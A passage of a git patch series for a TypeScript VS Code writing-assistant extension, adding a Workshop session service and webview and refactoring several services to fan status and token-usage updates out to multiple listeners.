+   * failed). The user turn stays — the thread honestly records the attempt.
+   * No-op for a stale requestId.
+   */
+  abandonToolRun(requestId: string): void {
+    if (this.activeRun?.requestId === requestId) {
+      this.activeRun = undefined;
+    }
+  }
+
+  /**
+   * Start a fresh session: clears the thread and any active run. The pinned
+   * excerpt survives — "New session" means a clean thread over the same
+   * working text (the acceptance criterion clears thread + active tool only);
+   * re-pinning replaces the excerpt explicitly.
+   */
+  reset(): void {
+    this.turns = [];
+    this.activeRun = undefined;
+    this.contextBrief = undefined;
+  }
+
+  /** Deep-enough copy of the aggregate for the webview to render from. */
+  getSnapshot(): WorkshopSessionSnapshot {
+    return {
+      excerpt: this.excerpt ? { ...this.excerpt } : undefined,
+      contextBrief: this.contextBrief,
+      turns: this.turns.map(cloneTurn),
+      activeToolId: this.activeRun?.toolId,
+      activeRequestId: this.activeRun?.requestId
+    };
+  }
+
+  private nextTurnId(role: 'user' | 'assistant'): string {
+    return `turn-${++this.turnCounter}-${role}-${this.now()}`;
+  }
+}
+
+/** Copy deep enough that no caller-held reference can reach stored state. */
+function cloneTurn(turn: WorkshopTurn): WorkshopTurn {
+  return { ...turn, usage: turn.usage ? { ...turn.usage } : undefined };
+}

--- a/packages/core/src/index.ts
+++ b/packages/core/src/index.ts
@@ -33,6 +33,9 @@ export type {
   SecretsPort
 } from '@/application/handlers/MessageHandlerContracts';
 
+// --- Application: Workshop session aggregate (ADR 2026-07-03) ---
+export { WorkshopSessionService } from '@/application/services/WorkshopSessionService';
+
 // --- Infrastructure: secrets ---
 export { SecretStorageService } from '@/infrastructure/secrets/SecretStorageService';
 

--- a/packages/core/src/infrastructure/account/AccountBalanceService.ts
+++ b/packages/core/src/infrastructure/account/AccountBalanceService.ts
@@ -23,6 +23,7 @@ import {
   ProviderStatus
 } from '@messages';
 import { LogSink } from '@/platform';
+import { ListenerSet } from '@/utils/ListenerSet';
 import { OpenRouterAccountClient } from './OpenRouterAccountClient';
 import { AccountCallResult } from './accountTypes';
 
@@ -47,12 +48,14 @@ export class AccountBalanceService {
   private pending?: Promise<AccountBalancePayload>;
   private pendingIsForced = false;
   private refreshTimer?: ReturnType<typeof setTimeout>;
-  private readonly listeners = new Set<AccountBalanceRefreshListener>();
+  private readonly listeners: ListenerSet<[AccountBalancePayload]>;
 
   constructor(
     private readonly openRouter: OpenRouterAccountClient,
     private readonly log?: LogSink
-  ) {}
+  ) {
+    this.listeners = new ListenerSet('[AccountBalanceService] Refresh listener', log);
+  }
 
   /**
    * Resolve current balances. Cached values are served when fresh and not
@@ -115,10 +118,7 @@ export class AccountBalanceService {
    * function. A thrown listener is logged but does not block other listeners.
    */
   addRefreshListener(listener: AccountBalanceRefreshListener): () => void {
-    this.listeners.add(listener);
-    return () => {
-      this.listeners.delete(listener);
-    };
+    return this.listeners.add(listener);
   }
 
   /** Cancel any armed refresh + drop listeners (call from handler dispose). */
@@ -146,13 +146,7 @@ export class AccountBalanceService {
         fetchedAt: Date.now()
       };
     }
-    for (const listener of this.listeners) {
-      try {
-        listener(payload);
-      } catch (error) {
-        this.log?.appendLine(`[AccountBalanceService] Refresh listener threw: ${errMessage(error)}`);
-      }
-    }
+    this.listeners.emit(payload);
   }
 
   private async fetchAll(): Promise<AccountBalancePayload> {

--- a/packages/core/src/infrastructure/api/orchestration/AIResourceManager.ts
+++ b/packages/core/src/infrastructure/api/orchestration/AIResourceManager.ts
@@ -48,7 +48,25 @@ export class AIResourceManager {
   private aiResources: Partial<Record<ModelScope, AIResourceBundle>> = {};
   private resolvedModels: Partial<Record<ModelScope, string>> = {};
   private statusCallback?: StatusCallback;
-  private tokenUsageCallback?: TokenUsageCallback;
+  private readonly tokenUsageListeners = new Set<TokenUsageCallback>();
+
+  /**
+   * Single stable closure handed to every orchestrator: fans token usage out
+   * to all registered listeners — one per live webview MessageHandler, now
+   * that the sidebar and the Workshop panel share this manager (ADR
+   * 2026-07-03). Stable identity means re-initialized orchestrators can never
+   * hold a stale generation of listeners.
+   */
+  private readonly tokenUsageFanout: TokenUsageCallback = (usage) => {
+    for (const listener of [...this.tokenUsageListeners]) {
+      try {
+        listener(usage);
+      } catch (error) {
+        const message = error instanceof Error ? error.message : String(error);
+        this.outputChannel?.appendLine(`[AIResourceManager] Token usage listener threw: ${message}`);
+      }
+    }
+  };
 
   constructor(
     private readonly resourceLoader: ResourceLoaderService,
@@ -170,18 +188,18 @@ export class AIResourceManager {
   }
 
   /**
-   * Set the token usage callback for centralized token tracking
+   * Subscribe to per-request token usage (centralized token tracking).
    *
-   * This callback is propagated to all AIResourceOrchestrators
-   * and will be called after each API call with usage data
-   *
-   * @param callback - Token usage callback function
+   * Every orchestrator reports through one stable fan-out, so multiple
+   * webview MessageHandlers can track usage concurrently without stealing
+   * each other's callback slot. Returns an unsubscribe function — callers own
+   * their registration and MUST release it on dispose.
    */
-  setTokenUsageCallback(callback?: TokenUsageCallback): void {
-    this.tokenUsageCallback = callback;
-    Object.values(this.aiResources).forEach(resource => {
-      resource?.orchestrator.setTokenUsageCallback(callback);
-    });
+  addTokenUsageListener(listener: TokenUsageCallback): () => void {
+    this.tokenUsageListeners.add(listener);
+    return () => {
+      this.tokenUsageListeners.delete(listener);
+    };
   }
 
   /**
@@ -214,7 +232,7 @@ export class AIResourceManager {
     this.disposeResources();
     this.resolvedModels = {};
     this.statusCallback = undefined;
-    this.tokenUsageCallback = undefined;
+    this.tokenUsageListeners.clear();
   }
 
   /**
@@ -235,7 +253,7 @@ export class AIResourceManager {
       const guideLoader = this.resourceLoader.getGuideLoader();
 
       const client = new OpenRouterClient(apiKey, model, this.outputChannel);
-      const conversationManager = new ConversationManager();
+      const conversationManager = new ConversationManager(this.outputChannel);
       const orchestrator = new AIResourceOrchestrator(
         client,
         conversationManager,
@@ -244,7 +262,7 @@ export class AIResourceManager {
         this.settings,
         this.statusCallback,
         this.outputChannel,
-        this.tokenUsageCallback
+        this.tokenUsageFanout
       );
 
       this.outputChannel?.appendLine(

--- a/packages/core/src/infrastructure/api/orchestration/AIResourceManager.ts
+++ b/packages/core/src/infrastructure/api/orchestration/AIResourceManager.ts
@@ -16,6 +16,8 @@
  */
 
 import { LogSink, SettingsStore } from '@/platform';
+import { ListenerSet } from '@/utils/ListenerSet';
+import { TokenUsage } from '@shared/types';
 import { OpenRouterClient } from '@providers/OpenRouterClient';
 import { AIResourceOrchestrator, StatusCallback, TokenUsageCallback } from './AIResourceOrchestrator';
 import { ConversationManager } from './ConversationManager';
@@ -48,7 +50,7 @@ export class AIResourceManager {
   private aiResources: Partial<Record<ModelScope, AIResourceBundle>> = {};
   private resolvedModels: Partial<Record<ModelScope, string>> = {};
   private statusCallback?: StatusCallback;
-  private readonly tokenUsageListeners = new Set<TokenUsageCallback>();
+  private readonly tokenUsageListeners: ListenerSet<[TokenUsage]>;
 
   /**
    * Single stable closure handed to every orchestrator: fans token usage out
@@ -58,14 +60,7 @@ export class AIResourceManager {
    * hold a stale generation of listeners.
    */
   private readonly tokenUsageFanout: TokenUsageCallback = (usage) => {
-    for (const listener of [...this.tokenUsageListeners]) {
-      try {
-        listener(usage);
-      } catch (error) {
-        const message = error instanceof Error ? error.message : String(error);
-        this.outputChannel?.appendLine(`[AIResourceManager] Token usage listener threw: ${message}`);
-      }
-    }
+    this.tokenUsageListeners.emit(usage);
   };
 
   constructor(
@@ -73,7 +68,12 @@ export class AIResourceManager {
     private readonly secretsService: SecretStorageService,
     private readonly settings: SettingsStore,
     private readonly outputChannel?: LogSink
-  ) {}
+  ) {
+    this.tokenUsageListeners = new ListenerSet(
+      '[AIResourceManager] Token usage listener',
+      outputChannel
+    );
+  }
 
   /**
    * Initialize AI resources for all model scopes
@@ -196,10 +196,7 @@ export class AIResourceManager {
    * their registration and MUST release it on dispose.
    */
   addTokenUsageListener(listener: TokenUsageCallback): () => void {
-    this.tokenUsageListeners.add(listener);
-    return () => {
-      this.tokenUsageListeners.delete(listener);
-    };
+    return this.tokenUsageListeners.add(listener);
   }
 
   /**

--- a/packages/core/src/infrastructure/api/orchestration/ConversationManager.ts
+++ b/packages/core/src/infrastructure/api/orchestration/ConversationManager.ts
@@ -3,6 +3,7 @@
  * Manages multi-turn conversation state for AI tools
  */
 
+import { LogSink } from '@/platform';
 import { OpenRouterMessage } from '@providers/OpenRouterClient';
 
 export interface ConversationContext {
@@ -14,6 +15,8 @@ export interface ConversationContext {
 export class ConversationManager {
   private conversations: Map<string, ConversationContext> = new Map();
   private nextId = 1;
+
+  constructor(private readonly log?: LogSink) {}
 
   /**
    * Start a new conversation with a system message
@@ -104,7 +107,7 @@ export class ConversationManager {
     }
 
     if (idsToDelete.length > 0) {
-      console.log(`Cleared ${idsToDelete.length} old conversation(s)`);
+      this.log?.appendLine(`[ConversationManager] Cleared ${idsToDelete.length} old conversation(s)`);
     }
   }
 

--- a/packages/core/src/infrastructure/api/services/analysis/AssistantToolService.ts
+++ b/packages/core/src/infrastructure/api/services/analysis/AssistantToolService.ts
@@ -15,6 +15,7 @@
  */
 
 import { LogSink } from '@/platform';
+import { ListenerSet } from '@/utils/ListenerSet';
 import { DialogueMicrobeatAssistant } from '@/tools/assist/dialogueMicrobeatAssistant';
 import { ProseAssistant } from '@/tools/assist/proseAssistant';
 import { WritingToolsAssistant } from '@/tools/assist/writingToolsAssistant';
@@ -49,7 +50,7 @@ export class AssistantToolService {
   private dialogueAssistant?: DialogueMicrobeatAssistant;
   private proseAssistant?: ProseAssistant;
   private writingToolsAssistant?: WritingToolsAssistant;
-  private readonly statusListeners = new Set<StatusEmitter>();
+  private readonly statusListeners: ListenerSet<Parameters<StatusEmitter>>;
 
   constructor(
     private readonly aiResourceManager: AIResourceManager,
@@ -57,12 +58,16 @@ export class AssistantToolService {
     private readonly toolOptions: ToolOptionsProvider,
     private readonly outputChannel?: LogSink
   ) {
+    this.statusListeners = new ListenerSet(
+      '[AssistantToolService] Status listener',
+      outputChannel
+    );
     // Bridge the manager's guide/resource-loading status into this service's
     // listener set once, permanently. The manager slot is process-wide; the
     // listeners are per-webview, added and removed as MessageHandlers come
     // and go (sidebar + Workshop share this service, ADR 2026-07-03).
     this.aiResourceManager.setStatusCallback((message: string, tickerMessage?: string) => {
-      this.emitStatus(message, undefined, tickerMessage);
+      this.statusListeners.emit(message, undefined, tickerMessage);
     });
     // Assistants will be initialized when AI resources are available
     void this.initializeAssistants();
@@ -74,25 +79,7 @@ export class AssistantToolService {
    * webview's teardown can never blind another's.
    */
   addStatusListener(listener: StatusEmitter): () => void {
-    this.statusListeners.add(listener);
-    return () => {
-      this.statusListeners.delete(listener);
-    };
-  }
-
-  private emitStatus(
-    message: string,
-    progress?: { current: number; total: number },
-    tickerMessage?: string
-  ): void {
-    for (const listener of [...this.statusListeners]) {
-      try {
-        listener(message, progress, tickerMessage);
-      } catch (error) {
-        const details = error instanceof Error ? error.message : String(error);
-        this.outputChannel?.appendLine(`[AssistantToolService] Status listener threw: ${details}`);
-      }
-    }
+    return this.statusListeners.add(listener);
   }
 
   /**

--- a/packages/core/src/infrastructure/api/services/analysis/AssistantToolService.ts
+++ b/packages/core/src/infrastructure/api/services/analysis/AssistantToolService.ts
@@ -49,7 +49,7 @@ export class AssistantToolService {
   private dialogueAssistant?: DialogueMicrobeatAssistant;
   private proseAssistant?: ProseAssistant;
   private writingToolsAssistant?: WritingToolsAssistant;
-  private statusEmitter?: StatusEmitter;
+  private readonly statusListeners = new Set<StatusEmitter>();
 
   constructor(
     private readonly aiResourceManager: AIResourceManager,
@@ -57,39 +57,41 @@ export class AssistantToolService {
     private readonly toolOptions: ToolOptionsProvider,
     private readonly outputChannel?: LogSink
   ) {
+    // Bridge the manager's guide/resource-loading status into this service's
+    // listener set once, permanently. The manager slot is process-wide; the
+    // listeners are per-webview, added and removed as MessageHandlers come
+    // and go (sidebar + Workshop share this service, ADR 2026-07-03).
+    this.aiResourceManager.setStatusCallback((message: string, tickerMessage?: string) => {
+      this.emitStatus(message, undefined, tickerMessage);
+    });
     // Assistants will be initialized when AI resources are available
     void this.initializeAssistants();
   }
 
   /**
-   * Set the status emitter for reporting guide loading progress
+   * Subscribe to guide-loading status. Returns an unsubscribe function —
+   * handlers own their registration and MUST release it on dispose, so one
+   * webview's teardown can never blind another's.
    */
-  setStatusEmitter(statusEmitter?: StatusEmitter): void {
-    this.statusEmitter = statusEmitter;
-    if (!statusEmitter) {
-      this.aiResourceManager.setStatusCallback(undefined);
-      return;
-    }
-    // Propagate to AIResourceManager for guide loading notifications
-    this.aiResourceManager.setStatusCallback((message: string, tickerMessage?: string) => {
-      this.sendStatus(message, undefined, tickerMessage);
-    });
+  addStatusListener(listener: StatusEmitter): () => void {
+    this.statusListeners.add(listener);
+    return () => {
+      this.statusListeners.delete(listener);
+    };
   }
 
-  /**
-   * Send status message via StatusEmitter
-   *
-   * @param message - Main status message
-   * @param progress - Optional progress tracking
-   * @param tickerMessage - Optional scrolling ticker text (guide names, etc.)
-   */
-  private sendStatus(
+  private emitStatus(
     message: string,
     progress?: { current: number; total: number },
     tickerMessage?: string
   ): void {
-    if (this.statusEmitter) {
-      this.statusEmitter(message, progress, tickerMessage);
+    for (const listener of [...this.statusListeners]) {
+      try {
+        listener(message, progress, tickerMessage);
+      } catch (error) {
+        const details = error instanceof Error ? error.message : String(error);
+        this.outputChannel?.appendLine(`[AssistantToolService] Status listener threw: ${details}`);
+      }
     }
   }
 

--- a/packages/core/src/infrastructure/api/services/dictionary/DictionaryService.ts
+++ b/packages/core/src/infrastructure/api/services/dictionary/DictionaryService.ts
@@ -17,6 +17,7 @@
  */
 
 import { LogSink } from '@/platform';
+import { ListenerSet } from '@/utils/ListenerSet';
 import { API_KEY_NOT_CONFIGURED_HEADING } from '@messages';
 import pLimit from 'p-limit';
 import { DictionaryUtility } from '@/tools/utility/dictionaryUtility';
@@ -76,7 +77,7 @@ export type ParallelGenerationProgressCallback = (progress: {
 
 export class DictionaryService {
   private dictionaryUtility?: DictionaryUtility;
-  private readonly statusListeners = new Set<StatusEmitter>();
+  private readonly statusListeners: ListenerSet<Parameters<StatusEmitter>>;
 
   // Parallel generation constants
   private readonly CONCURRENCY_LIMIT = 7;
@@ -88,6 +89,10 @@ export class DictionaryService {
     private readonly toolOptions: ToolOptionsProvider,
     private readonly outputChannel?: LogSink
   ) {
+    this.statusListeners = new ListenerSet(
+      '[DictionaryService] Status listener',
+      outputChannel
+    );
     // Dictionary will be initialized when AI resources are available
     void this.initializeDictionary();
   }
@@ -98,10 +103,7 @@ export class DictionaryService {
    * dispose (the service is shared across webviews).
    */
   addStatusListener(listener: StatusEmitter): () => void {
-    this.statusListeners.add(listener);
-    return () => {
-      this.statusListeners.delete(listener);
-    };
+    return this.statusListeners.add(listener);
   }
 
   /**
@@ -565,14 +567,7 @@ The measurement tools (Prose Statistics, Style Flags, Word Frequency) work witho
    * Send status update to every registered listener
    */
   private sendStatus(message: string, progress?: { current: number; total: number }, tickerMessage?: string): void {
-    for (const listener of [...this.statusListeners]) {
-      try {
-        listener(message, progress, tickerMessage);
-      } catch (error) {
-        const details = error instanceof Error ? error.message : String(error);
-        this.outputChannel?.appendLine(`[DictionaryService] Status listener threw: ${details}`);
-      }
-    }
+    this.statusListeners.emit(message, progress, tickerMessage);
   }
 
   /**

--- a/packages/core/src/infrastructure/api/services/dictionary/DictionaryService.ts
+++ b/packages/core/src/infrastructure/api/services/dictionary/DictionaryService.ts
@@ -76,7 +76,7 @@ export type ParallelGenerationProgressCallback = (progress: {
 
 export class DictionaryService {
   private dictionaryUtility?: DictionaryUtility;
-  private statusEmitter?: StatusEmitter;
+  private readonly statusListeners = new Set<StatusEmitter>();
 
   // Parallel generation constants
   private readonly CONCURRENCY_LIMIT = 7;
@@ -86,20 +86,22 @@ export class DictionaryService {
     private readonly aiResourceManager: AIResourceManager,
     private readonly resourceLoader: ResourceLoaderService,
     private readonly toolOptions: ToolOptionsProvider,
-    private readonly outputChannel?: LogSink,
-    statusEmitter?: StatusEmitter
+    private readonly outputChannel?: LogSink
   ) {
-    this.statusEmitter = statusEmitter;
     // Dictionary will be initialized when AI resources are available
     void this.initializeDictionary();
   }
 
   /**
-   * Set status callback for progress updates
-   * Called by MessageHandler after construction
+   * Subscribe to generation-progress status. Returns an unsubscribe function —
+   * each webview's MessageHandler owns its registration and releases it on
+   * dispose (the service is shared across webviews).
    */
-  setStatusEmitter(statusEmitter?: StatusEmitter): void {
-    this.statusEmitter = statusEmitter;
+  addStatusListener(listener: StatusEmitter): () => void {
+    this.statusListeners.add(listener);
+    return () => {
+      this.statusListeners.delete(listener);
+    };
   }
 
   /**
@@ -560,11 +562,16 @@ The measurement tools (Prose Statistics, Style Flags, Word Frequency) work witho
   }
 
   /**
-   * Send status update via status emitter
+   * Send status update to every registered listener
    */
   private sendStatus(message: string, progress?: { current: number; total: number }, tickerMessage?: string): void {
-    if (this.statusEmitter) {
-      this.statusEmitter(message, progress, tickerMessage);
+    for (const listener of [...this.statusListeners]) {
+      try {
+        listener(message, progress, tickerMessage);
+      } catch (error) {
+        const details = error instanceof Error ? error.message : String(error);
+        this.outputChannel?.appendLine(`[DictionaryService] Status listener threw: ${details}`);
+      }
     }
   }
 

--- a/packages/core/src/infrastructure/api/services/search/CategorySearchService.ts
+++ b/packages/core/src/infrastructure/api/services/search/CategorySearchService.ts
@@ -15,6 +15,7 @@
  */
 
 import { FileSystem, LogSink } from '@/platform';
+import { ListenerSet } from '@/utils/ListenerSet';
 import { WordSearchService } from './WordSearchService';
 import { AIResourceManager } from '@orchestration/AIResourceManager';
 import { WordFrequency } from '@/tools/measure/wordFrequency';
@@ -35,7 +36,7 @@ export class CategorySearchService {
   private readonly wordFrequency: WordFrequency;
   private readonly promptLoader: PromptLoader;
   private abortController: AbortController | null = null;
-  private readonly statusListeners = new Set<StatusEmitter>();
+  private readonly statusListeners: ListenerSet<Parameters<StatusEmitter>>;
 
   constructor(
     private readonly aiResourceManager: AIResourceManager,
@@ -46,6 +47,10 @@ export class CategorySearchService {
   ) {
     this.wordFrequency = new WordFrequency((msg) => this.outputChannel?.appendLine(msg));
     this.promptLoader = new PromptLoader(extensionPath, fileSystem);
+    this.statusListeners = new ListenerSet(
+      '[CategorySearchService] Status listener',
+      outputChannel
+    );
   }
 
   /**
@@ -54,10 +59,7 @@ export class CategorySearchService {
    * registration and releases it on dispose.
    */
   addStatusListener(listener: StatusEmitter): () => void {
-    this.statusListeners.add(listener);
-    return () => {
-      this.statusListeners.delete(listener);
-    };
+    return this.statusListeners.add(listener);
   }
 
   /**
@@ -497,14 +499,7 @@ export class CategorySearchService {
   }
 
   private sendStatus(message: string, progress?: { current: number; total: number }, tickerMessage?: string): void {
-    for (const listener of [...this.statusListeners]) {
-      try {
-        listener(message, progress, tickerMessage);
-      } catch (error) {
-        const details = error instanceof Error ? error.message : String(error);
-        this.outputChannel?.appendLine(`[CategorySearchService] Status listener threw: ${details}`);
-      }
-    }
+    this.statusListeners.emit(message, progress, tickerMessage);
   }
 
   /**

--- a/packages/core/src/infrastructure/api/services/search/CategorySearchService.ts
+++ b/packages/core/src/infrastructure/api/services/search/CategorySearchService.ts
@@ -35,26 +35,29 @@ export class CategorySearchService {
   private readonly wordFrequency: WordFrequency;
   private readonly promptLoader: PromptLoader;
   private abortController: AbortController | null = null;
+  private readonly statusListeners = new Set<StatusEmitter>();
 
   constructor(
     private readonly aiResourceManager: AIResourceManager,
     private readonly wordSearchService: WordSearchService,
     private readonly fileSystem: FileSystem,
     private readonly extensionPath: string,
-    private readonly outputChannel?: LogSink,
-    private statusEmitter?: StatusEmitter
+    private readonly outputChannel?: LogSink
   ) {
     this.wordFrequency = new WordFrequency((msg) => this.outputChannel?.appendLine(msg));
     this.promptLoader = new PromptLoader(extensionPath, fileSystem);
   }
 
   /**
-   * Attach the current webview's status sink after construction. The service is
-   * built at the composition root; MessageHandler owns this lifecycle-bound
-   * callback.
+   * Subscribe the current webview's status sink. The service is built at the
+   * composition root and shared across webviews; each MessageHandler owns its
+   * registration and releases it on dispose.
    */
-  setStatusEmitter(statusEmitter?: StatusEmitter): void {
-    this.statusEmitter = statusEmitter;
+  addStatusListener(listener: StatusEmitter): () => void {
+    this.statusListeners.add(listener);
+    return () => {
+      this.statusListeners.delete(listener);
+    };
   }
 
   /**
@@ -494,8 +497,13 @@ export class CategorySearchService {
   }
 
   private sendStatus(message: string, progress?: { current: number; total: number }, tickerMessage?: string): void {
-    if (this.statusEmitter) {
-      this.statusEmitter(message, progress, tickerMessage);
+    for (const listener of [...this.statusListeners]) {
+      try {
+        listener(message, progress, tickerMessage);
+      } catch (error) {
+        const details = error instanceof Error ? error.message : String(error);
+        this.outputChannel?.appendLine(`[CategorySearchService] Status listener threw: ${details}`);
+      }
     }
   }
 

--- a/packages/core/src/presentation/webview/WorkshopApp.tsx
+++ b/packages/core/src/presentation/webview/WorkshopApp.tsx
@@ -24,8 +24,9 @@ import { ErrorBoundary } from './components/shared/ErrorBoundary';
 import { TabErrorFallback } from './components/shared/TabErrorFallback';
 import { MarkdownRenderer } from './components/shared/MarkdownRenderer';
 import { StreamingContent } from './components/shared/StreamingContent';
-import { MessageType, ModelScope } from '@shared/types';
+import { MessageType } from '@shared/types';
 import { ApiKeyStatusMessage, WorkshopToolId, WorkshopTurn } from '@messages';
+import { ModelSelector } from './components/shared/ModelSelector';
 import {
   WORKSHOP_TOOL_CATALOG,
   WorkshopToolDescriptor
@@ -269,31 +270,17 @@ export const WorkshopApp: React.FC = () => {
           >
             <Icon name="refresh" size={13} /> New session
           </button>
-          {/* Model select — assistant scope, the same MODEL_DATA rails as the sidebar */}
-          <select
-            className="pm-ws-model"
-            aria-label="Assistant model"
-            value={modelsSettings.modelSelections.assistant ?? ''}
-            onChange={(event) =>
-              modelsSettings.setModelSelection('assistant' as ModelScope, event.target.value)
-            }
-            disabled={modelsSettings.modelOptions.length === 0}
-          >
-            {modelsSettings.modelOptions.length === 0 && <option value="">Model…</option>}
-            {modelsSettings.modelSelections.assistant &&
-              !modelsSettings.modelOptions.some(
-                (option) => option.id === modelsSettings.modelSelections.assistant
-              ) && (
-                <option value={modelsSettings.modelSelections.assistant}>
-                  {modelsSettings.modelSelections.assistant}
-                </option>
-              )}
-            {modelsSettings.modelOptions.map((option) => (
-              <option key={option.id} value={option.id}>
-                {option.label}
-              </option>
-            ))}
-          </select>
+          {/* Model browser — the SAME ModelSelector + ModelBrowserModal the
+              sidebar uses (assistant scope, same MODEL_DATA rails); only the
+              trigger is reskinned to the workshop chip via workshop.css. */}
+          <ModelSelector
+            scope="assistant"
+            options={modelsSettings.modelOptions}
+            value={modelsSettings.modelSelections.assistant}
+            onChange={modelsSettings.setModelSelection}
+            onOpenBrowser={() => modelsSettings.requestModelData(true)}
+            label="Assistant Model"
+          />
           <div className="pm-ws-balance" title={balanceTitle}>
             <span
               className={`pm-ws-balance-dot ${

--- a/packages/core/src/presentation/webview/WorkshopApp.tsx
+++ b/packages/core/src/presentation/webview/WorkshopApp.tsx
@@ -1,56 +1,75 @@
 /**
- * WorkshopApp — the Workshop editor-tab React root (ADR 2026-07-03, Sprint 1).
+ * WorkshopApp — the Workshop editor-tab React root (ADR 2026-07-03, Sprint 2).
  *
- * Static shell only: header (brand, model-select placeholder, balance
- * placeholder, New-session), left rail (pinned-excerpt placeholder, context
- * brief placeholder, tool palette), empty thread, DISABLED composer. Zero AI,
- * zero session state — every control is inert until Sprint 2 wires the
- * workshop domain (useWorkshop ↔ WorkshopHandler) and Sprint 2 swaps the
- * header placeholders for useModelsSettings / useAccountBalance.
+ * Session spine: the left rail pins an excerpt (host-side, via
+ * WORKSHOP_SET_EXCERPT), the tool palette fires WORKSHOP_RUN_TOOL, and the
+ * thread streams the run under `domain: 'workshop'` before the completed
+ * turn pair lands via WORKSHOP_TURN. All session truth lives in
+ * WorkshopSessionService on the host — this component renders snapshots, so
+ * a webview reload rehydrates the thread (useWorkshop's mount request).
  *
- * Rendered when the host stamps `data-pm-surface="workshop"` on #root; the
- * sidebar keeps rendering <App/>. One bundle, two roots.
+ * Header placeholders are now live: model select on the `assistant` scope via
+ * useModelsSettings, balance via useAccountBalance. The composer STAYS
+ * disabled — free-text follow-ups are Sprint 3, quick-action chips Sprint 4.
+ *
+ * Each region (rail / thread / composer) is wrapped in an ErrorBoundary the
+ * way App.tsx wraps its tabs — dynamic session data can throw mid-render now
+ * (PR #66 review, Sam).
  */
 
 import * as React from 'react';
 import { Icon, IconName } from './components/shared/Icon';
 import { PmLogo } from './components/shared/PmLogo';
-import { WritingToolsFocus } from '@shared/types';
+import { ErrorBoundary } from './components/shared/ErrorBoundary';
+import { TabErrorFallback } from './components/shared/TabErrorFallback';
+import { MarkdownRenderer } from './components/shared/MarkdownRenderer';
+import { StreamingContent } from './components/shared/StreamingContent';
+import { MessageType, ModelScope } from '@shared/types';
+import { ApiKeyStatusMessage, WorkshopToolId, WorkshopTurn } from '@messages';
+import {
+  WORKSHOP_TOOL_CATALOG,
+  WorkshopToolDescriptor
+} from '@shared/constants/workshopTools';
+import { useVSCodeApi } from './hooks/useVSCodeApi';
+import { usePersistence } from './hooks/usePersistence';
+import { useMessageRouter } from './hooks/useMessageRouter';
+import { useWorkshop } from './hooks/domain/useWorkshop';
+import { useModelsSettings } from './hooks/domain/useModelsSettings';
+import { useTokenTracking } from './hooks/domain/useTokenTracking';
+import { useAccountBalance } from './hooks/domain/useAccountBalance';
 import './workshop.css';
 
 /**
- * The Workshop tool catalog — the design prototype's 14 tools, mapped 1:1
- * onto the EXISTING analysis contracts: `dialogue`, `prose`, and the twelve
- * WritingToolsFocus modes. Labels/grouping come from the reference comp's
- * TOOLS table (docs/design/pm-frames-fulltab.js); ids are the wire values the
- * Sprint 2 handler will route on. Deterministic, in code — the LLM never
- * names buttons (epic invariant).
+ * Icons are presentation-only; ids/labels/grouping come from the shared
+ * catalog (`@shared/constants/workshopTools`) so the palette and the
+ * handler's turn labels can never drift (deterministic — the LLM never
+ * names buttons, epic invariant).
  */
-type WorkshopToolId = 'dialogue' | 'prose' | WritingToolsFocus;
+const TOOL_ICONS: Record<WorkshopToolId, IconName> = {
+  dialogue: 'dialogue',
+  prose: 'pen',
+  gestures: 'hand',
+  cliche: 'stamp',
+  repetition: 'repeat',
+  'decision-points': 'branch',
+  'show-and-tell': 'eye',
+  choreography: 'move',
+  'stock-and-signature': 'target',
+  placeholders: 'search',
+  style: 'palette',
+  editor: 'list',
+  continuity: 'link',
+  fresh: 'sprout',
+};
 
-interface WorkshopTool {
-  id: WorkshopToolId;
-  label: string;
+interface WorkshopTool extends WorkshopToolDescriptor {
   icon: IconName;
-  group: 'Primary' | 'Craft & Voice' | 'Technical';
 }
 
-export const WORKSHOP_TOOLS: readonly WorkshopTool[] = [
-  { id: 'dialogue', label: 'Dialogue & Beats', icon: 'dialogue', group: 'Primary' },
-  { id: 'prose', label: 'Prose', icon: 'pen', group: 'Primary' },
-  { id: 'gestures', label: 'Gestures', icon: 'hand', group: 'Primary' },
-  { id: 'cliche', label: 'Cliché', icon: 'stamp', group: 'Craft & Voice' },
-  { id: 'repetition', label: 'Repetition', icon: 'repeat', group: 'Craft & Voice' },
-  { id: 'decision-points', label: 'Decision Points', icon: 'branch', group: 'Craft & Voice' },
-  { id: 'show-and-tell', label: 'Show & Tell', icon: 'eye', group: 'Craft & Voice' },
-  { id: 'choreography', label: 'Choreography', icon: 'move', group: 'Craft & Voice' },
-  { id: 'stock-and-signature', label: 'Stock & Signature', icon: 'target', group: 'Craft & Voice' },
-  { id: 'placeholders', label: 'Placeholders', icon: 'search', group: 'Craft & Voice' },
-  { id: 'style', label: 'Style', icon: 'palette', group: 'Technical' },
-  { id: 'editor', label: 'Editor', icon: 'list', group: 'Technical' },
-  { id: 'continuity', label: 'Continuity', icon: 'link', group: 'Technical' },
-  { id: 'fresh', label: 'Fresh', icon: 'sprout', group: 'Technical' },
-];
+/** Catalog + icons; retained export shape from Sprint 1. */
+export const WORKSHOP_TOOLS: readonly WorkshopTool[] = WORKSHOP_TOOL_CATALOG.map(
+  (tool) => ({ ...tool, icon: TOOL_ICONS[tool.id] })
+);
 
 /**
  * The rail's six tools per the APPROVED Direction B prototype — which
@@ -73,7 +92,155 @@ const RAIL_TOOLS: readonly WorkshopTool[] = RAIL_TOOL_IDS.flatMap((id) => {
   return tool ? [tool] : [];
 });
 
+const countWords = (text: string): number => {
+  const trimmed = text.trim();
+  return trimmed.length === 0 ? 0 : trimmed.split(/\s+/).length;
+};
+
 export const WorkshopApp: React.FC = () => {
+  const vscode = useVSCodeApi();
+
+  // Domain hooks — same rails the sidebar rides (epic thesis: reuse, not
+  // reinvention). Balance/models/tokens arrive through this webview's own
+  // MessageHandler.
+  const workshop = useWorkshop();
+  const modelsSettings = useModelsSettings();
+  const tokenTracking = useTokenTracking();
+  const [hasSavedKey, setHasSavedKey] = React.useState(false);
+  const accountBalance = useAccountBalance({ apiKeyConfigured: hasSavedKey });
+
+  // Excerpt editor (local UI state only — the pinned excerpt itself is host state)
+  const [draftExcerpt, setDraftExcerpt] = React.useState('');
+  const [editingExcerpt, setEditingExcerpt] = React.useState(false);
+
+  const handleApiKeyStatus = React.useCallback((message: ApiKeyStatusMessage) => {
+    setHasSavedKey(!!message.payload?.hasSavedKey);
+  }, []);
+
+  useMessageRouter({
+    [MessageType.WORKSHOP_SESSION_STATE]: workshop.handleSessionState,
+    [MessageType.WORKSHOP_TURN]: workshop.handleTurn,
+    [MessageType.STREAM_STARTED]: workshop.handleStreamStarted,
+    [MessageType.STREAM_CHUNK]: workshop.handleStreamChunk,
+    [MessageType.STREAM_COMPLETE]: workshop.handleStreamComplete,
